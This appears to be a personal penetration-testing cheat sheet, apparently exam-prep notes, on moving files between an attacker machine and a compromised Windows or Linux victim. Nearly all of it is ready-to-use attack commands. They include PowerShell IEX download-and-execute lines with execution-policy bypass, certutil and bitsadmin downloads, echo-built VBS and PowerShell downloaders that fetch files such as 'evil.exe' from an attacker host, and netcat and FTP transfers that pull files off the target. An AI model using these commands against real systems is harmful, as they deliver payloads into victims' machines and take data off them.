My Checklist

smbser.py a path
copy \\ip\a\exploit.exe

Linux Transfer

wget http://IP_ADDR/file -O /path/to/where/you/want/file/to/go

curl http://IP_ADDR/file

fetch http://IP_ADDR/file

nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)

ftp -s:input.txt

tftp -i get file /path/on/victim



Windows Transfer

bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\output\path (Works on Windows 7/Windows Server 2000+)

nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)

ftp -s:input.txt

tftp -i get file /path/on/victim

powershell.exe -exec bypass -Command “& {iex((New-Object System.Net.WebClient).DownloadFile(‘http://IP_ADDR:PORT/FILE','C:\Users\user\AppData\Local\ack.exe'));}”

certutil -urlcache -split -f “http://IP_ADDR/FILE" FILENAME

smbserver

smbserver.py a ~/oscp

Powershell  script

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = “http://IP_ADDR/FILE" >> wget.ps1
echo $file = “FILE” >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>



VBS
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe

HTTP
# In Kali
python -m SimpleHTTPServer 80

# In reverse shell - Linux
wget 10.10.10.10/file

# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"


#linux
python -m SimpleHTTPServer 9999


#wget
wget 192.168.1.102:9999/file.txt

#curl
curl -O http://192.168.0.101/file.txt

#ncat
#attacking machine
nc -lvp 4444 < file

#target machine
nc 192.168.1.102 4444 > file


#php
echo "<?php file_put_contents('nameOfFile', fopen('http://ip/file', 'r')); ?>" > down2.php


#tftp
$ tftp 192.168.0.101
tftp> get myfile.txt
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"


#scp
# Copy a file:
scp /path/to/source/file.ext username@ip:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@ip:/path/to/destination


#python
Python SimpleHTTPServer

#on Attacker
python -m SimpleHTTPServer

#on target
wget <attackerip>:8000/filename


------------------------------

Apache

#on Attacker
cp filetosend.txt /var/www/html
service apache2 start

#on target
wget http://attackerip/file
curl http://attackerip/file > file
fetch http://attackerip/file        # on BSD

----------------------------------

Netcat (From Target to Kali)

# Listen on Kali
nc -lvp 4444 > file

# Send from Target machine
nc <kali_ip> 4444 < file

-----------------


Netcat (From Kali to Target)

# on target, wait for the file
nc -nvlp 55555 > file

# on kali, push the file
nc $victimip 55555 < file


----------------------

Extra:
To send the executable file to your machine:

base64 executable
# copy the output
# paste it in a file called file.txt
# decode it and create the executable
base64 -d file.txt > executable





#windows
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
https://blog.netspi.com/15-ways-to-download-a-file/

 certutil -urlcache -f http://ip/1.exe 1.exe


#Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1


#VBS
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://attackerip/evil.exe evil.exe

#powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
powershell -c "Invoke-WebRequest -Uri http://10.10.14.23/bfill.exe -OutFile C:\Users\kostas\Desktop\bfill.exe"
powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"



#FTP
echo open 192.168.1.101 21> ftp.txt
echo USER asshat>> ftp.txt
echo mysecretpassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt

ftp -v -n -s:ftp.txt

#debug
wine exe2bat.exe nc.exe nc.txt




--------------------------------------
TFTP
# Windows XP and Win 2003 contain tftp client. Windows 7 do not by default 
# tfpt clients are usually non-interactive, so they could work through an obtained shell 

atftpd --daemon --port 69 /tftp
Windows> tftp -i ip GET nc.exe

--------------------------------------

FTP (pyftpdlib client on Kali)
# Ftp is generally installed on Windows machines
# To make it interactive, use -s option

# On Kali install a ftp client and set a username/password
apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21

# on Windows
ftp <attackerip>
> binary
> get exploit.exe

-------------------------------------------

FTP (pureftpd client on Kali)

# on Kali

# install ftp client
apt-get install pure-ftpd

# create a group
groupadd ftpgroup

# add a user
useradd -g ftpgroup -d /dev/null -s /etc ftpuser

# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob).
mkdir /root/ftphome

# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish).
pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/

# Update the ftp database after adding our new user.
pure-pw mkdb

# change ownership of the specified ftp directory (and all it's sub-direcotries) 
chown -R ftpuser:ftpgroup /root/ftphome

# restart Pure-FTPD
/etc/init.d/pure-ftpd restart


# On Windows
echo open <attackerip> 21> ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

--------------------------------------

Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://<attackerip>/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

--------------------------------------
# Powershell download a file
powershell "IEX(New Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"

Last updated